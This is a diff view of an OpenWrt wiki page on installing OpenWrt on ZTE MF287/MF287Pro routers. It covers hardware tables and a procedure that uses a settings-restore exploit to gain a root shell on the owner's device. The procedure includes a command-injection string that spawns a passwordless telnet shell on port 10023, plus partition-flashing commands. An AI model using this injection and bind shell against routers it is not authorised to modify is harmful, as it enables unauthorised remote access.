Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
Next revisionBoth sides next revision
toh:zte:mf287 [2023/09/09 21:30] – [Info] andyboehtoh:zte:mf287 [2024/08/07 08:26] – Clarify installation procedure andyboeh
Line 9: Line 9:
   * ZTE MF287Pro   * ZTE MF287Pro
  
-The MF287 and MF287+ share the same board but feature a different LTE module while the ZTE MF287Pro has a different mainboard and again a different modem.+The MF287 and MF287+ have a very similar board but feature a different LTE module while the ZTE MF287Pro has a completely different mainboard and again a different modem.
  
 ===== Supported Versions ===== ===== Supported Versions =====
  
----- datatable ---- +<!-- ToH: { 
-cols    BrandModelVersions, Supported Current Rel, OEM device homepage URL_url, Forum Search_search-forumsDevice Techdata_pageid +  "source""json", 
-headers Brand, Model, Version, Current Release, OEM Info, Forum SearchTechnical Data +  "dom": "t", 
-align   c,c,c,c,c,c,c +  "paging": false
-filter  : Brand=ZTE +  "rotate"true
-filter  Model=MF287 +  "shownColumns"["brand""model""version""supportedcurrentrel""oemdevicehomepageurl""forumsearch", "deviceid"]
-filteror: Model=MF287Pro +  "filterColumns"{"brand": "^ZTE$", "model""^MF287$"} 
-----+-->
  
 ===== Hardware Highlights ===== ===== Hardware Highlights =====
----- datatable ---- +<!-- ToH: { 
-cols    ModelVersionsCPUCPU MHzCPU Cores_numcores, Flash MB_mbflashs, RAM MB_mbram, WLAN Hardware, WLAN 2.4GHz, WLAN 5.0GHz, Ethernet 100M ports_, Ethernet Gbit ports_, Modem, USB ports_ +  "source""json", 
-header  : ModelVersion,SoC,CPU MHz,CPU Cores,Flash MB,RAM MB,WLAN Hardware,WLAN2.4,WLAN5.0,100M ports,Gbit ports,Modem,USB +  "dom": "t", 
-align   : c,c,c,c,c,c,c,c,c,c,c,c,c +  "paging": false, 
-filter  : Brand=ZTE +  "rotate": true
-filter  Model=MF287 +  "shownColumns"["model""version""cpu""cpumhz""cpucores""flashmb""rammb""wlanhardware""wlan24ghz""wlan50ghz""ethernet100mports""ethernet1gports""modem""usbports"]
-filteror : Model=MF287Pro +  "filterColumns": {"brand""^ZTE$", "model""^MF287$"} 
-----+-->
  
  
Line 37: Line 37:
 /* stable release */ /* stable release */
  
----- datatable ---- +<!-- ToH: { 
-cols    ModelVersionsSupported Current RelFirmware OpenWrt Install URL_url, Firmware OpenWrt Upgrade URL_urlFirmware OEM Stock URL_url +  "source""json", 
-headers ModelVersionCurrent ReleaseFirmware OpenWrt InstallFirmware OpenWrt UpgradeFirmware OEM Stock +  "dom": "t", 
-align   : c,c,c +  "paging": false, 
-filter  : Brand=ZTE +  "rotate": true
-filter  Model=MF287 +  "shownColumns"["model""version""supportedcurrentrel""firmwareopenwrtinstallurl""firmwareopenwrtupgradeurl""firmwareoemstockurl"]
-filteror: Model=MF287Pro +  "filterColumns"{"brand": "^ZTE$", "model""^MF287$"} 
-----+-->
  
  
 /* snapshot */ /* snapshot */
 /* delete once stable release is available */ /* delete once stable release is available */
----- datatable ---- +<!-- ToH: { 
-cols    ModelVersionsSupported Current RelFirmware OpenWrt snapshot Install URL_url, Firmware OpenWrt snapshot Upgrade URL_url, Firmware OEM Stock URL_url +  "source""json", 
-headers ModelVersionCurrent ReleaseFirmware OpenWrt snapshot InstallFirmware OpenWrt snapshot UpgradeFirmware OEM Stock +  "dom": "t", 
-align   : c,c,c +  "paging": false
-filter  : Brand=ZTE +  "shownColumns"["model""version""supportedcurrentrel""firmwareopenwrtsnapshotinstallurl""firmwareopenwrtsnapshotupgradeurl""firmwareoemstockurl"]
-filter  Model=MF287 +  "filterColumns"{"brand": "^ZTE$", "model""^MF287$"} 
-filteror: Model=MF287Pro +-->
-----+
  
 ==== Option 1: Install from OEM firmware ==== ==== Option 1: Install from OEM firmware ====
 +<WRAP round important 80%>
 +**Required files**
  
-You need an exploit to get access to the stock firmware. Prepare the following: 
- 
-  * TFTP server - tftpd-hpa on Linux is tested, but tftpd32 should work as well 
   * Static build of busybox for ARM, e.g. from https://busybox.net/downloads/binaries/1.21.1/ (Pick ARMV7 version)   * Static build of busybox for ARM, e.g. from https://busybox.net/downloads/binaries/1.21.1/ (Pick ARMV7 version)
 +  * exploit.dat from https://cloud.aboehler.at/index.php/s/GDixspLf4jgg8pT. Please use the password ''%%nzjmaBARoM%%''
 +  * OpenWrt factory image - this is **not** listed in the table above. Please download it from [[https://firmware-selector.openwrt.org/?version=23.05.4&target=ipq40xx%2Fgeneric&id=zte_mf287pro]]
 +</WRAP>
 +
 +Then do the following preparatory steps:
 +
 +  * Set up a TFTP server - tftpd-hpa on Linux is tested, but tftpd32 should work as well
   * Rename busybox to "telnetd" and put it to your TFTP root directory   * Rename busybox to "telnetd" and put it to your TFTP root directory
-  * Download the exploit.dat from https://cloud.aboehler.at/index.php/s/GDixspLf4jgg8pT. Please use the password ''%%nzjmaBARoM%%'' +  * Put the OpenWrt **factory.bin** file to your TFTP directory as zte.bin
-  * Put the OpenWrt factory.bin file to your TFTP directory as zte.bin+
   * Assign your computer the IP address 192.168.0.22   * Assign your computer the IP address 192.168.0.22
  
Line 73: Line 77:
   - Log in to the web interface of your router, go to settings restore and use the file "exploit.dat" as the file to restore. Accept the message that the router is going to be restarted - don't worry, it won't restart.   - Log in to the web interface of your router, go to settings restore and use the file "exploit.dat" as the file to restore. Accept the message that the router is going to be restarted - don't worry, it won't restart.
   - Watch your TFTP server serving the file "telnetd"   - Watch your TFTP server serving the file "telnetd"
-  - Use a Telnet client and connect to 192.168.0.1 +  - Use a Telnet client and connect to 192.168.0.1 on port 10023 
-  - Login as user "admin" and password "admin"+  - You should be logged in immediately, no password required
   - Execute the following commands to take a backup and to install OpenWrt (NB: Instead of using tftp, you should also be able to use ''%%scp%%'' from the router):   - Execute the following commands to take a backup and to install OpenWrt (NB: Instead of using tftp, you should also be able to use ''%%scp%%'' from the router):
 +
 +<WRAP round important 80%>
 +For the MF287 and MF287+, you need to replace ''%%mtdXX%%'' with ''%%mtd13%%'' and ''%%mtdblockXX%%'' with ''%%mtdblock13%%''!
 +For the MF287Pro, you need to replace ''%%mtdXX%%'' with ''%%mtd17%%'' and ''%%mtdblockXX%%'' with ''%%mtdblock17%%''!
 +</WRAP>
 +
 +<WRAP round important 80%>
 +Please double-check the partition number by running ''%%cat /proc/mtd%%'' and looking for the line named ''%%rootfs%%''. Use this mtd number.
 +</WRAP>
 +
 +<WRAP round important 80%>
 +Please double-check that you flash the correct file. The factory image is **not** part of the table above, but it can be downloaded from the [[https://firmware-selector.openwrt.org/?version=23.05.4&target=ipq40xx%2Fgeneric&id=zte_mf287pro|Firmware Selector]].
 +</WRAP>
 +
 <code> <code>
 cd /tmp cd /tmp
Line 85: Line 103:
 tftp -g -r zte.bin 192.168.0.22 tftp -g -r zte.bin 192.168.0.22
 cat /proc/driver/sensor_id cat /proc/driver/sensor_id
-flash_erase /dev/mtd13 0 0 +flash_erase /dev/mtdXX 0 0 
-dd if=zte.bin of=/dev/mtdblock13 bs=131072+dd if=zte.bin of=/dev/mtdblockXX bs=131072
 reboot reboot
 </code> </code>
Line 109: Line 127:
  
 Once rebooted, transfer the files ubi0_0 and ubi0_1 to your router to /tmp. Then, run the following commands to restore back to stock - the "ls" command is used to get the sizes of kernel and rootfs. Replace ''%%$kernel_length%%'' by the value you got for ubi0_0 and ''%%$rootfs_size%%'' by the value you got for ubi0_1. Once rebooted, transfer the files ubi0_0 and ubi0_1 to your router to /tmp. Then, run the following commands to restore back to stock - the "ls" command is used to get the sizes of kernel and rootfs. Replace ''%%$kernel_length%%'' by the value you got for ubi0_0 and ''%%$rootfs_size%%'' by the value you got for ubi0_1.
 +
 +<WRAP round important 80%>
 +Please double-check the partition number by running ''%%cat /proc/mtd%%'' and looking for the line named ''%%rootfs%%''. Use this mtd number. For the MF287Pro, this should be ''%%ubiattach -m 14%%'' with ''%%ubiattach -m 17%%''.
 +</WRAP>
  
 <code> <code>
Line 152: Line 174:
             return False             return False
                  
-        exploit = ";zte_debug.sh 192.168.0.22 telnetd; sleep 3600\n"+        exploit = ";zte_debug.sh 192.168.0.22 telnetd; /tmp/telnetd -l /bin/sh -p 10023; sleep 3600\n"
         out = bytearray()         out = bytearray()
         for char in exploit:         for char in exploit:
Line 210: Line 232:
 ==== Info ==== ==== Info ====
  
----- datatemplatelist dttpllist ---- +<!-- ToH: { 
-templatemeta:template_datatemplatelist +  "source""json", 
-cols    BrandModelVersionsDevice TypeAvailabilitySupported Since Commit_gitSupported since RelSupported current RelUnsupportedBootloaderCPUTargetCPU MHzFlash MBsRAM MBSwitchEthernet 100M ports_Ethernet Gbit ports_Comments network ports_ModemVLANWLAN 2.4GHzWLAN 5.0GHzWLAN HardwaresWLAN Comments_Detachable Antennas_USB ports_SATA ports_Comments USB SATA ports_SerialJTAGLED countButton countPower supplyDevice Techdata_pageidForum topic URL_urlwikidevi URL_urlOEM Device Homepage URL_urlFirmware OEM Stock URL_urlFirmware OpenWrt Install URL_urlFirmware OpenWrt Upgrade URL_urlComments_ +  "dom""t", 
-filter  : Brand=ZTE +  "paging"false, 
-filter  Model=MF287 +  "rotate": true, 
-----+  "shownColumns": ["brand""model""version""devicetype""availability""supportedsincecommit""supportedsincerel""supportedcurrentrel""unsupported_functions""bootloader""cpu""target""cpumhz""flashmb""rammb""switch""ethernet100mports""ethernet1gports""commentsnetworkports""modem""vlan""wlan24ghz""wlan50ghz""wlanhardware""wlancomments""detachableantennas""usbports""sataports""commentsusbsataports""serial""jtag""ledcount""buttoncount""powersupply""deviceid""owrt_forum_topic_url""wikideviurl""oemdevicehomepageurl""firmwareoemstockurl", "firmwareopenwrtinstallurl", "firmwareopenwrtupgradeurl", "comments"]
 +  "filterColumns": {"brand""^ZTE$", "model""^MF287$"} 
 +-->
  
 ---- datatemplatelist dttpllist ---- ---- datatemplatelist dttpllist ----
  • Last modified: 2024/12/09 10:32
  • by colo